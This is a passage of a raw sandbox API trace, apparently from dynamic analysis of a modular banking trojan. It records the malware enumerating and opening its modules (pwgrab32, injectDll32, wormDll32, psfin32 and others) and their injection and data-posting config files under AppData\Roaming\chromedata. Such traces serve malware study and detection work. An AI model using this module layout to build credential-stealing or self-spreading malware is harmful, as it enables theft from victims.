	[0255.891] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa20) returned 1
	[0255.891] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c4130
	[0255.891] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffa20
	[0255.891] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x100) returned 0x2807678
	[0255.891] lstrcmpiW (lpString1="injectDll32", lpString2="pwgrab32") returned -1
	[0255.891] lstrcmpiW (lpString1="pwgrab32", lpString2="pwgrab32") returned 0
	[0255.891] lstrcmpiW (lpString1="networkDll32", lpString2="pwgrab32") returned -1
	[0255.892] lstrcmpiW (lpString1="psfin32", lpString2="pwgrab32") returned -1
	[0255.892] lstrcmpiW (lpString1="shareDll32", lpString2="pwgrab32") returned 1
	[0255.892] lstrcmpiW (lpString1="wormDll32", lpString2="pwgrab32") returned 1
	[0255.892] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c4130) returned 1
	[0255.892] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2807678) returned 1
	[0255.892] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffa20) returned 1
	[0255.892] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff930) returned 1
	[0255.892] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225eb8
	[0255.892] GetExitCodeThread (in: hThread=0x13c, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0255.892] GetExitCodeThread (in: hThread=0x140, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0255.892] GetExitCodeThread (in: hThread=0x578, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0255.892] GetExitCodeThread (in: hThread=0x628, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0255.892] GetExitCodeThread (in: hThread=0x5e4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0255.892] GetExitCodeThread (in: hThread=0x6d4, lpExitCode=0x128a88 | out: lpExitCode=0x128a88) returned 1
	[0255.892] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225eb8) returned 1
	[0255.892] Sleep (dwMilliseconds=0x4e20) 
	[0255.903] Sleep (dwMilliseconds=0x4e20) 
	[0255.918] Sleep (dwMilliseconds=0x4e20) 
	[0255.934] Sleep (dwMilliseconds=0x4e20) 
	[0255.950] Sleep (dwMilliseconds=0x4e20) 
	[0255.965] Sleep (dwMilliseconds=0x4e20) 
	[0255.981] Sleep (dwMilliseconds=0x4e20) 
	[0255.996] Sleep (dwMilliseconds=0x4e20) 
	[0256.012] Sleep (dwMilliseconds=0x4e20) 
	[0256.028] Sleep (dwMilliseconds=0x4e20) 
	[0256.043] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x8039ea60, dwHighDateTime=0x1d50a6a)) 
	[0256.043] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0256.043] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32_configs\\dinj" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32_configs\\dinj"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0256.044] GetFileTime (in: hFile=0x668, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ba0c660, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x7cece240, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.044] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x8039ea60, dwHighDateTime=0x1d50a6a)) 
	[0256.044] GetFileTime (in: hFile=0x668, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5c68b9e0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x7e96f860, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.044] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x8039ea60, dwHighDateTime=0x1d50a6a)) 
	[0256.044] GetFileTime (in: hFile=0x668, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x5ceba580, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x5cee06e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.044] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x8039ea60, dwHighDateTime=0x1d50a6a)) 
	[0256.044] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0256.044] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0256.045] GetFileTime (in: hFile=0x668, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x60507b60, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6052dcc0, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.045] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x8039ea60, dwHighDateTime=0x1d50a6a)) 
	[0256.045] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0256.045] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0256.045] GetFileTime (in: hFile=0x668, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x69f02a80, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.045] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x8039ea60, dwHighDateTime=0x1d50a6a)) 
	[0256.045] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0256.045] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32_configs\\dpost" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32_configs\\dpost"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0256.045] GetFileTime (in: hFile=0x668, lpCreationTime=0x128cb4, lpLastAccessTime=0x128cac, lpLastWriteTime=0x128ca4 | out: lpCreationTime=0x128cb4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x128cac*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x128ca4*(dwLowDateTime=0x6eff1680, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.045] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x128ce0 | out: lpSystemTimeAsFileTime=0x128ce0*(dwLowDateTime=0x8039ea60, dwHighDateTime=0x1d50a6a)) 
	[0256.045] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0256.045] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x128cfc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0256.045] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0256.045] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0256.046] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x22b6b80
	[0256.046] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1
	[0256.046] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5992b680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5992b680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x599517e0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x90bc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32", cAlternateFileName="INJECT~1")) returned 1
	[0256.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff930
	[0256.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21c5d8
	[0256.046] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x5b9e6500, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5ceba580, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ceba580, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="injectDll32_configs", cAlternateFileName="INJECT~2")) returned 1
	[0256.046] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x68a088a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x68a088a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x68a088a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x4ab0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32", cAlternateFileName="NETWOR~1")) returned 1
	[0256.046] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff930, Size=0x10) returned 0x22ffa20
	[0256.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d2c8
	[0256.046] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0256.046] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0256.046] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa20, Size=0x10) returned 0x22ff930
	[0256.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21e408
	[0256.046] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0256.046] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0256.046] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ff930, Size=0x10) returned 0x22ffa20
	[0256.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d718
	[0256.046] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0256.046] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0256.046] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffa20, Size=0x20) returned 0x27c4130
	[0256.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d4f0
	[0256.046] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0256.046] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c4130, Size=0x20) returned 0x27bff68
	[0256.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21dfb8
	[0256.046] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 1
	[0256.046] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27bff68, Size=0x20) returned 0x27c4130
	[0256.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21db68
	[0256.046] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 0
	[0256.046] GetLastError () returned 0x12
	[0256.046] FindClose (in: hFindFile=0x22b6b80 | out: hFindFile=0x22b6b80) returned 1
	[0256.046] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0256.046] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0256.047] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0256.047] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0256.047] GetFileTime (in: hFile=0x668, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.047] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x8039ea60, dwHighDateTime=0x1d50a6a)) 
	[0256.047] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0256.047] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0256.047] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0256.047] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0256.047] GetFileTime (in: hFile=0x668, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.047] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x8039ea60, dwHighDateTime=0x1d50a6a)) 
	[0256.047] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0256.047] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0256.047] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0256.047] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0256.047] GetFileTime (in: hFile=0x668, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.047] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x8039ea60, dwHighDateTime=0x1d50a6a)) 
	[0256.048] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0256.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0256.048] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0256.048] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0256.048] GetFileTime (in: hFile=0x668, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0256.048] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x8039ea60, dwHighDateTime=0x1d50a6a)) 
	[0256.048] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0256.048] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0256.048] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
